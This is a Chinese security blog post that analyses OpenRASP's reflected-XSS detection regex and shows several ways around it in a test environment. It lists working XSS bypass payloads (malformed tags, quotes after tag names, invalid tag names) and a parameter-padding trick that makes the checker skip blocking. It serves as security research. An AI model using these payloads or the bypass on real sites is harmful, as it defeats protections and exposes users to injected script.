【网络安全】OpenRASP xss算法的几种绕过方法

openrasp默认只能检测反射型XSS，存储型XSS仅IAST商业版支持。对于反射型xss，openrasp也只能检测可控输出点在html标签外的情况，本文的绕过方法是针对这种情况。如果可控输出点在html标签内，如<input type="text" value="$input">或<script>...</script> 内部，openrasp几乎检测不到。

测试环境

【网安学习资料】

windows / tomcat / jdk1.8 / openrasp 1.3.7-beta

测试环境部署参见www.anquanke.com/post/id/241…，或者官网文档。

在official.js中xss_userinput算法默认配置为ignore，修改为block来开启拦截。此时点击官方测试用例中下面链接，即可触发openrasp拦截。

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/d1e6460005e844caa521fdd00de3a406~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fp3.ssl.qhimg.com%252Ft01356f49ca51bf9ffe.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fp3.ssl.qhimg.com%2Ft01356f49ca51bf9ffe.png”” style=“margin: auto” />

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/8d568a4ee25e431ea949d9675f3a7e37~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fp5.ssl.qhimg.com%252Ft01940339fb313fdf9b.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fp5.ssl.qhimg.com%2Ft01940339fb313fdf9b.png”” style=“margin: auto” />

openrasp xss算法

openrasp xss算法有2种。算法1是针对PHP环境，此处不考虑。算法2是用户输入匹配算法，根据注释说明，算法原理是”当用户输入长度超过15，匹配上标签正则，且出现在响应里，直接拦截”。

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/5132013e248a48c8977af23e2b994652~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fp0.ssl.qhimg.com%252Ft0136744832f3ec0696.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fp0.ssl.qhimg.com%2Ft0136744832f3ec0696.png”” style=“margin: auto” />

标签正则含义使用regexper网站解析如下

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/482cf38994eb4f7ab7be275aafff64aa~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fp0.ssl.qhimg.com%252Ft01af305b14a63132a6.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fp0.ssl.qhimg.com%2Ft01af305b14a63132a6.png”” style=“margin: auto” />

标签正则从整体上来说匹配两种情况，一是请求参数值中有子字符串以<! 开头的；二是请求参数值中有子字符串以< 开头的。对于第二种情况，标签正则会匹配< 字符后接1到12个大小写字母，再后接/ 或> 或0x00 - 0x20 字符的字符串。所以下面这些常见的xss测试payload都会拦截。

<script>alert(1)</script> // "<script>"部分匹配标签正则
<img src=1 onerror=alert()> // "<img "部分匹配正则，空格符对应正则中0x20
<svg/onload=alert()>//"<svg/"部分匹配正则 

<img src=1 onerror=alert()>触发拦截

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/40360eb1d59e4b789fdc669b2073342d~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fp4.ssl.qhimg.com%252Ft014936125b67fb01b8.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fp4.ssl.qhimg.com%2Ft014936125b67fb01b8.png”” style=“margin: auto” />

标签正则绕过

【网安学习资料】

整理网上的一些xss 绕过payload，发现下面这些可以顺利绕过标签正则

<d3v/onmouseleave=[1].some(confirm)>click
<d3/onmouseenter=[2].find(confirm)>z
<d3"<"/onclick="1>[confirm``]"<">z
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z 

浏览器直接输入上面那些xss payload会报400响应错误。对payload进行url编码所有字符。

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/f739fcd210304afb980a883bfa14157d~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fp2.ssl.qhimg.com%252Ft018840de1306ca138e.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fp2.ssl.qhimg.com%2Ft018840de1306ca138e.png”” style=“margin: auto” />

burpsuite repeater中右键”copy url”，复制url到浏览器中访问，点击即可触发弹框。

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/783090e443ce4493bb7fabd266fb2714~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fp4.ssl.qhimg.com%252Ft011fbad0a21551c801.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fp4.ssl.qhimg.com%2Ft011fbad0a21551c801.png”” style=“margin: auto” />

标签后接单双引号

【网安学习资料】

收集过程中还发现下面这两种xss payload也可以绕过。

<a"/onclick=(confirm)()>click 
<a'/onclick=(confirm)()>click 

简单测了下其他标签后接单引号或双引号进行绕过，好像蛮多都行的。

<button onclick=alert()>12</button>// 拦截
<button' onclick=alert()>12</button> // 点击弹框
<button" onclick=alert()>12</button> // 点击弹框
<div onclick=alert()>12</div>// 拦截
<div' onclick=alert()>12</div> // 点击弹框
<div" onclick=alert()>12</div> // 点击弹框 

例如，使用123<img' src=1 onclick=alert()>123 ，url编码后，点击也能弹框。

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/df61b84df7324525b7de18f57ec5ae88~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fp1.ssl.qhimg.com%252Ft01a647ed530b4d24f9.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fp1.ssl.qhimg.com%2Ft01a647ed530b4d24f9.png”” style=“margin: auto” />

构造无效标签

【网安学习资料】

这种也可以用于绕过openrasp。看到这种绕过方式，感觉前面的都不香了。

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/88dc9592899a4bf69449b077a946fe55~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fp3.ssl.qhimg.com%252Ft0164f0fc49f94ded5e.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fp3.ssl.qhimg.com%2Ft0164f0fc49f94ded5e.png”” style=“margin: auto” />

只要构造如下payload即可

<abc1 onclick=confirm()>click here // 标签名是字母+数字 

验证如下

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/33491c8059994d9591098fa4373aed49~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fp5.ssl.qhimg.com%252Ft0114f6e8a35ad706fc.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fp5.ssl.qhimg.com%2Ft0114f6e8a35ad706fc.png”” style=“margin: auto” />

或者

<abcdefabcdefa onclick=confirm()>click here // 标签名称长度大于12 

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/1598b15c4a5143d983322f945c774105~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fp4.ssl.qhimg.com%252Ft019a8c1820a9f4a76d.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fp4.ssl.qhimg.com%2Ft019a8c1820a9f4a76d.png”” style=“margin: auto” />

程序逻辑绕过

【网安学习资料】

还有一种绕过方法，是从程序检测逻辑上进行绕过。

openrasp xss具体检测代码实现在这个文件中agent/java/engine/src/main/java/com/baidu/openrasp/plugin/checker/local/XssChecker.java。下面的一段代码是对”当用户输入长度超过15，匹配上标签正则，且出现在响应里，直接拦截”的具体实现。

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/a93b9eb8aa5b4eba9344963d20598f55~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fp1.ssl.qhimg.com%252Ft014e85bbfecb259241.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fp1.ssl.qhimg.com%2Ft014e85bbfecb259241.png”” style=“margin: auto” />

但代码中多了一处逻辑。如果请求会传递多个参数，当某个参数值长度大于15，且匹配之前的标签正则<![-[A-Za-z]|<([A-Za-z]{1,12})[/\x00-\x20>] ，如果对应参数值没有在响应中出现时，变量count值会加1。当count值大于10时，openrasp会直接放行。控制程序运行到上面图片中第二个方框中即可产生绕过。

绕过演示

【网安学习资料】

此处为了查看payload内容方便，使用了post请求。如果转换成get请求，并对参数值url编码，效果一样。

原始请求会触发拦截

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/51714d4b2c14407abb3276b438dacbe6~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fp0.ssl.qhimg.com%252Ft0159aca56387091f9d.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fp0.ssl.qhimg.com%2Ft0159aca56387091f9d.png”” style=“margin: auto” />

绕过payload。在input参数前面添加多个input[n]的参数，且参数值为其他xss payload。

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/f25b6a783c5e43698406be1323688e1a~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fp2.ssl.qhimg.com%252Ft01f0d25049eabe8618.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fp2.ssl.qhimg.com%2Ft01f0d25049eabe8618.png”” style=“margin: auto” />

转换成get请求，并对payload进行编码。

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/21f289322ed34f339952526561e3e64d~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fp1.ssl.qhimg.com%252Ft01f387d753c363ba30.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fp1.ssl.qhimg.com%2Ft01f387d753c363ba30.png”” style=“margin: auto” />

绕过payload分析

【网安学习资料】

构造的绕过payload有几点要求。一是，虚构的请求参数理论上至少要有11个，如前面input0到input11请求参数。如果没成功，最好在增加几个请求参数。二是，虚构的请求参数名取值有些要求。三是，虚构的请求参数值不能与真实请求参数值相同。

因为这样的话，input0到input11这些请求参数在parameterMap 中会排在input参数前面，见下图。

[<img src=“https://p3-juejin.byteimg.com/tos-cn-i-k3u1fbpfcp/4cf07d99c29342f0adbf37f5e77ed94f~tplv-k3u1fbpfcp-zoom-in-crop-mark:4536:0:0:0.image)](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttps%253A%252F%252Fp4.ssl.qhimg.com%252Ft01a7ace01a2b6f2703.png “https://www.oschina.net/action/GoToLink?url=https%3A%2F%2Fp4.ssl.qhimg.com%2Ft01a7ace01a2b6f2703.png”” style=“margin: auto” />

这样input0到input11这些参数就会优先input请求参数被openrasp检测逻辑处理，从而击中count > exceedLengthCount 的条件进行绕过。

【想学网络安全的同学，上船啦】